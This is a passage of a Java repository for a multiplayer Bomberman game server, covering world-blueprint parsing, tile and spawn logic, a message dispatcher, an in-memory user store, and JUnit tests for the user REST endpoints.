        final HashMap<String, IWorldBuilder> builders = new HashMap<>();
        final File[] worldBlueprints = new File("data/worlds").listFiles();

        if (worldBlueprints == null)
            LOGGER.fatal("Cannot access world blueprints folder or it is empty!");
        else
            for (final File blueprint : worldBlueprints)
                if (!blueprint.isDirectory())
                    try {
                        final String fileName = blueprint.getName();
                        final int extensionStart = fileName.lastIndexOf('.');
                        // Tolerate extensionless files instead of crashing on substring(0, -1).
                        final String nameWithoutExtension = (extensionStart >= 0) ? fileName.substring(0, extensionStart) : fileName;
                        builders.put(nameWithoutExtension, new TextWorldBuilderV11(blueprint));
                    } catch (Exception ex) {
                        LOGGER.info("Cannot build world from file\"" + blueprint.getAbsolutePath() + "\". Ignoring.");
                    }

        return builders;
    }

    /**
     * Parses a v1.1 text blueprint. Expected layout:
     * line 1 — the version tag "v1.1"; line 2 — the world's display name;
     * line 3 onward — tile rows (the first row fixes the world width).
     * Row reading stops at the "#EOF" tag, at a row of a different length,
     * or at the physical end of the file.
     *
     * @param blueprint the blueprint file to read
     * @throws Exception if the file cannot be read or is not a valid v1.1 blueprint
     */
    @SuppressWarnings("OverlyBroadThrowsClause")
    public TextWorldBuilderV11(File blueprint) throws Exception {
        //noinspection OverlyBroadCatchBlock
        try (BufferedReader strings = new BufferedReader(new FileReader(blueprint))) {
            // Null-safe version check: an empty file no longer causes a NullPointerException.
            if (!CURRENT_VERSION.equals(strings.readLine()))
                throw new Exception();

            name = strings.readLine();
            final String firstRow = strings.readLine();
            if (name == null || firstRow == null)
                throw new Exception(); // Truncated file: header present but no tile data.
            rawTiles.add(firstRow); // 1st line of tiles specifies world width.

            boolean reachedEOF = false;
            while (!reachedEOF) {
                final String newLine = strings.readLine();
                // Fixed: a blueprint without the "#EOF" tag used to dereference null here
                // and crash. Physical end of file now terminates the world like the tag does.
                if (newLine == null || newLine.equals(EOF_TAG) || newLine.length() != rawTiles.get(0).length())
                    reachedEOF = true;
                else
                    rawTiles.add(newLine);
            }

            // Fixed: the check used '==', which flagged exactly-minimum worlds while
            // letting smaller ones through — the opposite of the message below.
            if (rawTiles.size() < MIN_HEIGHT || rawTiles.get(0).length() < MIN_WIDTH) {
                LOGGER.error("World \"" + blueprint.getAbsolutePath() + "\" is too small! Make it at least " + MIN_WIDTH + 'x' + MIN_HEIGHT + '.');
            }
        } catch (IOException ex) {
            LOGGER.error("Cannot read\"" + blueprint.getAbsolutePath() + "\" due to some weird reason! Check server's rights.");
            throw ex;
        } catch (Exception ex) {
            // Log message fixed ("has version different version than" was garbled).
            LOGGER.info("World \"" + blueprint.getAbsolutePath() + "\" has a version different than " + CURRENT_VERSION);
            throw ex;
        }
    }

    /**
     * Builds a fresh tile grid from the blueprint text and returns it together with
     * the bomberman spawn points and the world's display name.
     * Synchronized: one builder instance can be shared between worlds
     * (see {@link #getAllTextBuilders()}).
     *
     * @param newSupplicant the world asking for data; used as the source of tile IDs
     * @return freshly generated world data
     */
    @Override
    public synchronized WorldData getWorldData(World newSupplicant) {
        supplicant = newSupplicant;
        generateWorldFromText();
        isFirstTimeRun = false; // Spawn points are collected only during the first generation.
        return new WorldData(tileArray, getBombermenSpawns(), name);
    }

    // Converts the collected spawn point queue into the float[N][2] array WorldData expects.
    private float[][] getBombermenSpawns() {
        final float[][] spawnArray = new float[spawnList.size()][2]; // 2 for x and y coordinates
        int i = 0;
        for (final float[] onePoint : spawnList) {
            spawnArray[i] = onePoint;
            i++;
        }
        return spawnArray;
    }

    // Instantiates the tile grid from the raw text rows, row by row.
    private void generateWorldFromText() {
        tileArray = new ITile[rawTiles.size()][rawTiles.get(0).length()];
        int y = 0;
        for (final String row : rawTiles) {
            int x = 0;
            for (final char tileChar : row.toCharArray()) {
                tileArray[y][x] = mapSymbolToTile(tileChar, x, y);
                x++;
            }
            y++;
        }
    }

    // Maps a single blueprint character to a tile instance; null means an empty cell.
    // 'S' is not a tile: it records a bomberman spawn point, on the first pass only.
    @SuppressWarnings({"MagicNumber", "OverlyComplexMethod"})
    @Nullable
    private ITile mapSymbolToTile(char c, int x, int y) {
        switch (c) {
            case '.':
                return null;
            case 'x':
                return TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
            case 'd':
                return TileFactory.getInstance().getNewTile(EntityType.DESTRUCTIBLE_WALL, supplicant.getNextID());
            case 'P':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_DECBOMBSPAWN, supplicant, supplicant.getNextID());
            case 'R':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCMAXRANGE, supplicant, supplicant.getNextID());
            case 'H':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_DROPBOMBONDEATH, supplicant, supplicant.getNextID());
            case 'M':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_MOREBOMBS, supplicant, supplicant.getNextID());
            case 'U':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCMAXHP, supplicant, supplicant.getNextID());
            case 'F':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_INCSPEED, supplicant, supplicant.getNextID());
            case 'I':
                return TileFactory.getInstance().getNewTile(EntityType.BONUS_INVUL, supplicant, supplicant.getNextID());
            case 'S':
                if (isFirstTimeRun)
                    spawnList.add(new float[]{x + 0.5f, y + 0.5f});
                return null;
            default:
                LOGGER.warn("Found undocumented symbol '" + c + "'. Treating him like an empty place.");
                return null;
        }
    }

    private World supplicant;                      // World currently being generated; supplies tile IDs.
    private ITile[][] tileArray;                   // Last generated grid, [row][column].
    private final Queue<float[]> spawnList = new LinkedList<>();
    private boolean isFirstTimeRun = true;         // True until the first getWorldData() completes.
    private String name = "REPORT AS A BUG";       // Overwritten by the blueprint's name line.

    private final ArrayList<String> rawTiles = new ArrayList<>(32);

    private static final Logger LOGGER = LogManager.getLogger(TextWorldBuilderV11.class);

    private static final String CURRENT_VERSION = "v1.1";
    private static final String EOF_TAG = "#EOF";
    private static final int MIN_WIDTH = 2;
    private static final int MIN_HEIGHT = 2;
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/Updateable.java
package bomberman.mechanics.interfaces;
/**
 * Contract for game objects whose state advances once per simulation tick.
 */
public interface Updateable {
    /**
     * Advances this object's state.
     *
     * @param deltaT time elapsed since the previous update tick
     *               (units are defined by the game loop — presumably milliseconds; confirm with caller)
     */
    void update(long deltaT);
}
<file_sep>/src/test/java/rest/UsersTest.java
package rest;
import constants.Constants;
import main.accountservice.AccountService;
import main.UserTokenManager;
import main.config.Context;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.glassfish.jersey.test.JerseyTest;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.core.*;
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
public class UsersTest extends JerseyTest {
@Test
public void testOkCreateUser() {
    // Successful registration must respond OK and set the session cookie.
    final Triplet<String, HttpHeaders, Response> request =
            RequestFactory.getCreateUserTestData(RequestFactory.CreateUserType.CREATE_OK);
    testCreateUser(request, true);
}
@Test
public void testAlreadyExistsCreateUser() {
    // Registering a taken login must fail and must not set a session cookie.
    final Triplet<String, HttpHeaders, Response> request =
            RequestFactory.getCreateUserTestData(RequestFactory.CreateUserType.CREATE_USER_EXISTS);
    testCreateUser(request, false);
}
@Test
public void testOkGetUserByID() {
    // Looking up an existing user by ID must return that user's data.
    final Pair<Long, Response> request =
            RequestFactory.getUserByIDTestData(RequestFactory.GetByIDType.GET_BY_ID_OK);
    testGetUserByID(request);
}
@Test
public void testNoUserGetUserByID() {
    // Looking up a nonexistent ID must produce the factory's error response.
    final Pair<Long, Response> request =
            RequestFactory.getUserByIDTestData(RequestFactory.GetByIDType.GET_BY_WRONG_ID);
    testGetUserByID(request);
}
@Test
public void testOkUpdateUser() {
    // A logged-in user updating their own account must succeed.
    final Triplet<String, HttpHeaders, Response> request =
            RequestFactory.getUpdateUserTestData(RequestFactory.UpdateUserType.UPDATE_OK);
    testUpdateUser(request);
}
@Test
public void testWrongCookieUpdateUser() {
testUpdateUser(RequestFactory.getUpdateUserTestData(RequestFactory.UpdateUserType.UPDATE_ANOTHER_USER));
}
@Test
public void testOkDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_OK));
}
@Test
public void testNoCookieDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_NOT_LOGGED));
}
@Test
public void testAnotherUserDeleteUser() {
testDeleteUser(RequestFactory.getDeleteUserTestData(RequestFactory.DeleteUserType.DELETE_ANOTHER_USER));
}
@Before
public void setContext() {
users.setContext(CONTEXT);
}
@BeforeClass
public static void makeContext() throws InstantiationException {
final AccountService mockedAccountService = Constants.RestApplicationMocks.getMockedAccountService();
CONTEXT.put(AccountService.class, mockedAccountService);
final Map<String, String> properties = new HashMap<>(3);
properties.put("static_path", "static/");
properties.put("userpic_width", "80");
properties.put("userpic_height", "80");
CONTEXT.put(Properties.class, properties);
}
public void testCreateUser(Triplet<String, HttpHeaders, Response> data, boolean shouldHaveCookie){
final Response response = users.createUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
if (shouldHaveCookie)
assertEquals(SID, response.getCookies().get(UserTokenManager.COOKIE_NAME).getValue());
else
assertEquals(false, response.getCookies().containsKey(UserTokenManager.COOKIE_NAME));
}
public void testGetUserByID(Pair<Long, Response> data) {
final Response response = users.getUserByID(data.getValue0());
assertEquals(data.getValue1().toString(), response.toString());
assertEquals(data.getValue1().getEntity().toString(), response.getEntity().toString());
}
public void testUpdateUser(Triplet<String, HttpHeaders, Response> data) {
final Response response = users.updateUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
}
public void testDeleteUser(Triplet<Long, HttpHeaders, Response> data) {
final Response response = users.deleteUser(data.getValue0(), data.getValue1());
assertEquals(data.getValue2().toString(), response.toString());
assertEquals(data.getValue2().getEntity().toString(), response.getEntity().toString());
}
// A bit of magic, without which nothing works.
@Override
protected Application configure() {
//noinspection OverlyBroadCatchBlock
try {
final ResourceConfig config = new ResourceConfig(Sessions.class);
final HttpServletRequest request = mock(HttpServletRequest.class);
//noinspection AnonymousInnerClassMayBeStatic
config.register(new AbstractBinder() {
@Override
protected void configure() {
bind(CONTEXT);
bind(request).to(HttpServletRequest.class);
}
});
config.getInstances();
return config;
} catch (Exception ex) {
ex.printStackTrace();
fail();
}
return null;
}
private static class RequestFactory {
public static Triplet<String, HttpHeaders, Response> getCreateUserTestData(CreateUserType type){
switch (type)
{
case CREATE_OK:
return Triplet.with(okCreateJSON(), NO_COOKIE_HEADERS, okCreateResponse());
case CREATE_USER_EXISTS:
return Triplet.with(wrongCreateJSON(), NO_COOKIE_HEADERS, userExistsCreateResponse());
}
throw new IllegalArgumentException();
}
public static Pair<Long, Response> getUserByIDTestData(GetByIDType type) {
switch (type) {
case GET_BY_ID_OK:
return Pair.with(ID, okGetByIDResponse());
case GET_BY_WRONG_ID:
return Pair.with(0L, wrongGetByIDResponse());
}
throw new IllegalArgumentException();
}
public static Triplet<String, HttpHeaders, Response> getUpdateUserTestData(UpdateUserType type) {
switch (type) {
case UPDATE_OK:
return Triplet.with(okUpdateJSON(), OK_COOKIE_HEADERS, okUpdateResponse());
case UPDATE_ANOTHER_USER:
return Triplet.with(okUpdateJSON(), WRONG_COOKIE_HEADERS, wrongUpdateResponse());
}
throw new IllegalArgumentException();
}
public static Triplet<Long, HttpHeaders, Response> getDeleteUserTestData(DeleteUserType type) {
switch (type) {
case DELETE_OK:
return Triplet.with(ID, OK_COOKIE_HEADERS, okDeleteResponse());
case DELETE_ANOTHER_USER:
return Triplet.with(0L, OK_COOKIE_HEADERS, wrongUserDeleteResponse());
case DELETE_NOT_LOGGED:
return Triplet.with(ID, NO_COOKIE_HEADERS, noCookieDeleteResponse());
}
throw new IllegalArgumentException();
}
private static String okCreateJSON() {
return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
}
private static String wrongCreateJSON() {
return new JSONObject().put("login", PASSWORD).put("password", LOGIN).toString(); // Supposing this user is already registered;
}
private static Response okCreateResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static Response userExistsCreateResponse() {
return WebErrorManager.accessForbidden("User already exists!");
}
private static Response okGetByIDResponse() {
return Response.ok(new JSONObject().put("id", ID).put("login", LOGIN).put("score", 0L).toString()).build();
}
private static Response wrongGetByIDResponse() {
return WebErrorManager.accessForbidden();
}
private static String okUpdateJSON() {
return new JSONObject().put("login", LOGIN).put("password", <PASSWORD>).toString();
}
private static Response okUpdateResponse() {
return Response.ok(new JSONObject().put("id", ID).toString()).build();
}
private static Response wrongUpdateResponse() {
return WebErrorManager.authorizationRequired("Not logged in!");
}
private static Response okDeleteResponse() {
return WebErrorManager.ok();
}
private static Response wrongUserDeleteResponse() {
return WebErrorManager.accessForbidden("Not your user!");
}
private static Response noCookieDeleteResponse() {
return WebErrorManager.authorizationRequired("Not logged in!");
}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum CreateUserType {CREATE_OK, CREATE_USER_EXISTS}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum GetByIDType {GET_BY_ID_OK, GET_BY_WRONG_ID}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum UpdateUserType {UPDATE_OK, UPDATE_ANOTHER_USER}
@SuppressWarnings("InnerClassTooDeeplyNested")
public enum DeleteUserType {DELETE_OK, DELETE_ANOTHER_USER, DELETE_NOT_LOGGED}
}
private static final Context CONTEXT = new Context();
private final Users users = new Users();
private static final HttpHeaders NO_COOKIE_HEADERS = Constants.RestApplicationMocks.getNoCookieHeaders();
private static final HttpHeaders OK_COOKIE_HEADERS = Constants.RestApplicationMocks.getOkCookieHeaders();
private static final HttpHeaders WRONG_COOKIE_HEADERS = Constants.RestApplicationMocks.getWrongCookieHeaders();
@SuppressWarnings("ConstantNamingConvention")
private static final long ID = Constants.USER_ID;
private static final String LOGIN = Constants.USER_LOGIN;
private static final String PASSWORD = <PASSWORD>;
private static final String SID = Constants.USER_SESSION_ID;
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/behaviors/ActionTileAbstractBehavior.java
package bomberman.mechanics.tiles.behaviors;
import bomberman.mechanics.World;
import bomberman.mechanics.tiles.ActionTile;
/**
 * Base class for behaviors that action tiles run each tick.
 * A behavior holds a back-reference to the world (for posting events) and is
 * linked to its owning tile after construction.
 */
public abstract class ActionTileAbstractBehavior {
    /** Tile this behavior is attached to; set via {@link #linkWithTile}. */
    protected ActionTile owner;
    /** World used as an event sink by concrete behaviors. */
    protected final World eventList;

    public ActionTileAbstractBehavior(World eventList) {
        this.eventList = eventList;
    }

    /** Attaches this behavior to the tile that owns it. */
    public void linkWithTile(ActionTile newOwner) {
        this.owner = newOwner;
    }

    /** Performs one tick of tile-specific behavior. */
    public abstract void behave(long deltaT);
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/Ownable.java
package bomberman.mechanics.interfaces;
import bomberman.mechanics.Bomberman;
/**
 * Implemented by entities that belong to a specific bomberman (e.g. bombs, bomb rays).
 */
public interface Ownable {
/** @return the bomberman that owns this entity. */
Bomberman getOwner();
}
<file_sep>/cfg/server.properties
port = 80
host = localhost
db_type = hash<file_sep>/src/main/java/bomberman/service/ReceivedMessageHandler.java
package bomberman.service;
import org.json.JSONObject;
import rest.UserProfile;
import rest.WebErrorManager;
/**
 * Parses one JSON message received from a player's connection and forwards it
 * to the appropriate {@link Room} action.
 *
 * Improvement: the long if/else-if chain on the message type is replaced with an
 * idiomatic switch-on-String with uniform early returns; behavior is unchanged.
 */
public class ReceivedMessageHandler /*implements Runnable*/ {
    public ReceivedMessageHandler(UserProfile userProfile, Room userRoom, JSONObject jsonMessage) {
        room = userRoom;
        message = jsonMessage;
        user = userProfile;
    }

    /**
     * Dispatches the message by its "type" field.
     *
     * @return true if the type was recognized and all required fields were present;
     *         false for unknown types or malformed payloads.
     */
    public boolean execute() {
        final String messageType = message.getString("type");
        // Any message except a keep-alive ping counts as activity and resets the idle-kick timer.
        if (!messageType.equals("ping"))
            room.refreshUserKickTimer(user);
        switch (messageType) {
            case "object_changed":
                if (WebErrorManager.showFieldsNotPresent(message, "x", "y") != null)
                    return false;
                room.scheduleBombermanMovement(user, message.getInt("x"), message.getInt("y"));
                return true;
            case "bomb_spawned":
                room.scheduleBombPlacement(user);
                return true;
            case "user_state_changed":
                if (WebErrorManager.showFieldsNotPresent(message, "isReady", "contentLoaded") != null)
                    return false;
                room.updatePlayerState(user, message.getBoolean("isReady"), message.getBoolean("contentLoaded"));
                return true;
            case "chat_message":
                if (WebErrorManager.showFieldsNotPresent(message, "user_id", "text") != null)
                    return false;
                room.broadcast(message.toString());
                return true;
            case "enable_bots":
                if (WebErrorManager.showFieldsNotPresent(message, "value") != null)
                    return false;
                room.activateBots(message.getBoolean("value"));
                return true;
            case "ping":
                return true;  // Keep-alive only; deliberately does not refresh the kick timer.
            default:
                return false; // Unknown message type.
        }
    }

    private final UserProfile user;
    private final Room room;
    private final JSONObject message;
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/functors/IncreaseBombRangeFunctor.java
package bomberman.mechanics.tiles.functors;
import bomberman.mechanics.Bomberman;
import bomberman.mechanics.World;
import bomberman.mechanics.WorldEvent;
import bomberman.mechanics.interfaces.EventType;
/**
 * Pickup functor: grants the collecting bomberman +1 bomb explosion range,
 * then removes the bonus tile from the world.
 */
public class IncreaseBombRangeFunctor extends ActionTileAbstractFunctor {
public IncreaseBombRangeFunctor(World eventList) {
super(eventList);
}
@Override
public void applyAction(Bomberman bomberman) {
bomberman.increaseExplosionRange();
// Consume the tile: post a removal event attributed to the collecting bomberman.
eventList.addWorldEvent(new WorldEvent(EventType.TILE_REMOVED, owner.getType(), owner.getID(), 0, 0, bomberman.getID()));
}
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/IEntity.java
package bomberman.mechanics.interfaces;
/**
 * Marker interface for game entities: anything that can be updated per tick
 * and described to clients. Adds no members of its own.
 */
public interface IEntity extends Updateable, Describable{
}
<file_sep>/src/main/java/main/databaseservice/DataBaseServiceHashMapImpl.java
package main.databaseservice;
import org.jetbrains.annotations.Nullable;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.atomic.AtomicLong;
/**
 * In-memory DataBaseService backed by two hash maps (login -> profile, id -> profile).
 * IDs are issued from a monotonically increasing counter. Not thread-safe:
 * the two maps are updated without synchronization.
 */
public class DataBaseServiceHashMapImpl implements DataBaseService {
    /** No-op: the hash-map backend keeps everything in memory; nothing to persist. */
    @Override
    public void save(UserProfileData dataSet) {
    }

    /**
     * Registers a new user under a fresh ID.
     *
     * @return the new profile, or null if the login is already taken.
     */
    @Override
    @Nullable
    public UserProfile addUser(String login, String password, boolean isGuest) {
        if (containsLogin(login))
            return null;
        final UserProfileData newUserData = new UserProfileData(login, password, isGuest);
        newUserData.setId(idCounter.incrementAndGet());
        final UserProfile newUser = new UserProfile(newUserData);
        loginToUser.put(login, newUser);
        idToUser.put(newUser.getId(), newUser);
        return newUser;
    }

    /** Convenience overload: registers a non-guest user. */
    @Nullable
    @Override
    public UserProfile addUser(String login, String password) {
        return addUser(login, password, false);
    }

    @Override
    @Nullable
    public UserProfile getById(long id) {
        return idToUser.get(id);
    }

    @Override
    @Nullable
    public UserProfile getByLogin(String name) {
        return loginToUser.get(name);
    }

    @Override
    public Collection<UserProfile> getUsers() {
        return idToUser.values();
    }

    @Override
    public boolean containsID(Long id) {
        return idToUser.containsKey(id);
    }

    @Override
    public boolean containsLogin(String name) {
        return loginToUser.containsKey(name);
    }

    /**
     * Removes the user from both indices.
     * Fix: the original dereferenced {@code idToUser.get(id)} unconditionally and
     * threw NullPointerException for an unknown id; deleting a missing user is now a no-op.
     */
    @Override
    public void deleteUser(Long id) {
        final UserProfile deletingUser = idToUser.remove(id);
        if (deletingUser != null)
            loginToUser.remove(deletingUser.getLogin());
    }

    @Nullable
    @Override
    @Deprecated
    public Collection<UserProfile> getTop10Users() {
        return getUsers(); // I'm lazy.
    }

    private final AtomicLong idCounter = new AtomicLong();
    private final Map<String, UserProfile> loginToUser = new HashMap<>();
    private final Map<Long, UserProfile> idToUser = new HashMap<>();
}
<file_sep>/src/main/java/bomberman/mechanics/worldbuilders/BasicWorldBuilder.java
package bomberman.mechanics.worldbuilders;
import bomberman.mechanics.TileFactory;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.*;
import javax.inject.Singleton;
@Singleton
public class BasicWorldBuilder implements IWorldBuilder {
    @Override
    public WorldData getWorldData(World supplicant) {
        return new WorldData(getITileArray(supplicant), getBombermenSpawns(), getName());
    }

    /**
     * Builds the tile grid with indestructible walls along all four borders.
     *
     * Fix: the border loops previously indexed the last COLUMN with
     * DEFAULT_WORLD_HEIGHT - 1 and the last ROW with DEFAULT_WORLD_WIDTH - 1 —
     * harmless only while both constants are 32. Each axis now uses its own constant.
     */
    private ITile[][] getITileArray(World supplicant) {
        // Array has dimensions YxX because java multi-dimensional arrays are arrays of arrays.
        // This means [first][] bracket pair is number of array we want to access.
        // And [][second] bracket pair is true position of an element we want to access.
        // Thus [Y][X] element means Xth element in Yth row.
        final ITile[][] tileArray = new ITile[DEFAULT_WORLD_HEIGHT][DEFAULT_WORLD_WIDTH];
        // Filling left and right border columns.
        for (int j = 0; j < tileArray.length; ++j)
        {
            tileArray[j][0] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
            tileArray[j][DEFAULT_WORLD_WIDTH - 1] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
        }
        // Filling top and bottom rows except for first and last columns: something is already there.
        for (int i = 1; i < tileArray[0].length - 1; ++i)
        {
            tileArray[0][i] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
            tileArray[DEFAULT_WORLD_HEIGHT - 1][i] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
        }
        return tileArray;
    }

    // Spawn points as {x, y} pairs, one per world corner.
    // Fix: the fourth corner was {HEIGHT-1, WIDTH-1}, i.e. y-before-x, contradicting
    // the other three entries; it is now {WIDTH-1, HEIGHT-1}.
    // NOTE(review): corner coordinates WIDTH-1 / HEIGHT-1 coincide with the border
    // wall tiles built above — confirm whether WIDTH-2 / HEIGHT-2 was intended.
    private float[][] getBombermenSpawns() {
        return new float[][]{{1.0f, 1.0f},{1.0f, (float)(DEFAULT_WORLD_HEIGHT - 1)},{(float)(DEFAULT_WORLD_WIDTH - 1), 1.0f},{(float)(DEFAULT_WORLD_WIDTH - 1), (float)(DEFAULT_WORLD_HEIGHT - 1)}};
    }

    @SuppressWarnings("SameReturnValue")
    private String getName() {
        return "REPORT AS A BUG";
    }

    private static final int DEFAULT_WORLD_HEIGHT = 32;
    private static final int DEFAULT_WORLD_WIDTH = 32;
}
<file_sep>/src/test/java/rest/UserProfileTest.java
package rest;
import main.databaseservice.UserProfileData;
import org.json.JSONException;
import org.json.JSONObject;
import org.junit.Test;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotSame;
/**
 * Unit tests for UserProfile: JSON serialization, session-ID uniqueness,
 * password/score accessors, and hashCode/equals behavior as HashMap keys.
 */
public class UserProfileTest {
@Test
public void testToJson() throws JSONException {
final JSONObject userJson = new UserProfile(new UserProfileData("", "")).toJson();
// A fresh profile serializes with id -1, empty login, zero score, and no userpic.
final JSONObject fieldsJson = new JSONObject().put("id", -1).put("login", "").put("score", 0).put("userpic_path", JSONObject.NULL);
assertEquals(fieldsJson.toString(), userJson.toString());
}
@Test
public void testGetDifferentSessionID() {
final UserProfile user1 = new UserProfile(new UserProfileData("user1", ""));
final UserProfile user2 = new UserProfile(new UserProfileData("user2", ""));
// Every profile must get its own session identifier.
assertNotSame(user1.getSessionID(), user2.getSessionID());
}
@Test
public void testGetPassword() throws Exception {
final String password = "<PASSWORD>";
final UserProfile user = new UserProfile(new UserProfileData("login", password));
assertEquals(password, user.getPassword());
}
@Test
public void testSetPassword() throws Exception {
String password = "<PASSWORD>";
final UserProfile user = new UserProfile(new UserProfileData("login", password));
password = "<PASSWORD>";
assertNotSame(password, user.getPassword());
user.setPassword(password);
assertEquals(password, user.getPassword());
}
@Test
public void testGetScore() throws Exception {
final int score = 0;
final UserProfile user = new UserProfile(new UserProfileData("login", "password"));
assertEquals(score, user.getScore());
}
@Test
public void testSetScore() throws Exception {
final int score = 1;
final UserProfile user = new UserProfile(new UserProfileData("login", "password"));
assertNotSame(score, user.getScore());
user.setScore(score);
assertEquals(score, user.getScore());
}
// Profiles must work correctly as HashMap keys: stable hash, distinct per user.
@Test
public void testHashCode() throws Exception {
final UserProfile user1 = new UserProfile(new UserProfileData("admin", "admin"));
user1.getData().setId(1);
final UserProfile user2 = new UserProfile(new UserProfileData("guest", "1234"));
assertEquals(user1.hashCode(), user1.hashCode());
assertNotSame(user1.hashCode(), user2.hashCode());
final Map<Long, UserProfile> map = new HashMap<>();
map.put(user1.getId(), user1);
assertEquals(false, map.isEmpty());
assertEquals(user1, map.get(user1.getId()));
map.put(user2.getId(), user2);
assertEquals(false, map.isEmpty());
assertEquals(user1, map.get(user1.getId()));
assertEquals(user2, map.get(user2.getId()));
assertNotSame(user1, map.get(user2.getId()));
assertNotSame(user2, map.get(user1.getId()));
}
@Test
public void testEquals() throws Exception {
final UserProfile user1 = new UserProfile(new UserProfileData("admin", "admin"));
final UserProfile user2 = new UserProfile(new UserProfileData("guest", "1234"));
assertEquals(user1, user1);
assertEquals(false, user2.equals(user1));
}
}<file_sep>/src/main/java/bomberman/mechanics/World.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.*;
import bomberman.mechanics.tiles.behaviors.BombRayBehavior;
import bomberman.mechanics.worldbuilders.WorldData;
import bomberman.service.TimeHelper;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.jetbrains.annotations.Nullable;
import java.util.*;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.Collectors;
public class World {
/**
 * Builds a world of the requested type: fetches the matching builder, copies its
 * tile grid / spawn points / name, then emits TILE_SPAWNED events for every tile.
 *
 * @param worldType key understood by WorldBuilderForeman
 */
public World(String worldType) {
final IWorldBuilder builder = WorldBuilderForeman.getWorldBuilderInstance(worldType);
final WorldData worldData = builder.getWorldData(this);
tileArray = worldData.getTileArray();
spawnLocations = worldData.getSpawnList();
name = worldData.getName();
registerNewTiles();
}
/** Enqueues an incoming event for processing on the next game-loop iteration. */
public void addWorldEvent(WorldEvent worldEvent) {
newEventQueue.add(worldEvent);
}
/** @return the next unique entity ID (monotonically increasing, atomic). */
public int getNextID() {
return uidManager.getAndIncrement();
}
/**
 * Drains and returns all events processed since the previous call.
 * NOTE(review): copy-then-clear is not atomic — events appended between the copy
 * and clear() would be lost if another thread writes concurrently; confirm this
 * is only called from the game-loop thread.
 */
public Queue<WorldEvent> getFreshEvents() {
final Queue<WorldEvent> newQueue = new LinkedList<>(processedEventQueue);
processedEventQueue.clear();
return newQueue;
}
// For linking to Players via Room.
/** @return the IDs of all live bombermen, in list order. */
public int[] getBombermenIDs(){
    return bombermen.stream().mapToInt(Bomberman::getID).toArray();
}
/** @return how many spawn points this map provides (upper bound on players + bots). */
public int getNumberOfSpawns() {
return spawnLocations.length;
}
/**
 * Spawns {@code amount} player-controlled bombermen on the first spawn points
 * and emits a TILE_SPAWNED event per bomberman.
 *
 * Improvement: the bounds-failure now throws with a diagnostic message instead of
 * a bare exception, and the spawn location is read once per iteration.
 *
 * @param amount number of bombermen to create
 * @throws ArrayIndexOutOfBoundsException if the map has fewer spawn locations than requested
 */
public void spawnBombermen(int amount){
    if (spawnLocations.length < amount)
        throw new ArrayIndexOutOfBoundsException("Cannot spawn " + amount + " bombermen: only " + spawnLocations.length + " spawn locations exist.");
    for (int i = 0; i < amount; ++i) {
        final float[] spawn = spawnLocations[i];
        final Bomberman newBomberman = new Bomberman(getNextID(), this, spawn);
        newBomberman.setCoordinates(spawn);
        bombermen.add(newBomberman);
        processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, newBomberman.getType(), newBomberman.getID(), spawn[0], spawn[1], null));
    }
}
/**
 * Fills every spawn point not already taken by a player with an AI-controlled
 * bomberman, emitting a TILE_SPAWNED event for each bot.
 */
public void spawnBots() {
    final int firstFreeSpawn = bombermen.size();
    final int botsToSpawn = spawnLocations.length - firstFreeSpawn;
    for (int botNumber = 0; botNumber < botsToSpawn; ++botNumber) {
        final float[] spawn = spawnLocations[firstFreeSpawn + botNumber];
        final Bomberman bot = new BombermanBot(getNextID(), this, spawn);
        bot.setCoordinates(spawn);
        bombermen.add(bot);
        processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, bot.getType(), bot.getID(), spawn[0], spawn[1], null));
    }
}
/** @return the map's display name, as provided by the world builder. */
public String getName() {
return name;
}
/** @return world width in tiles (length of a row; grid is [y][x]). */
public int getWidth() {
return tileArray[0].length;
}
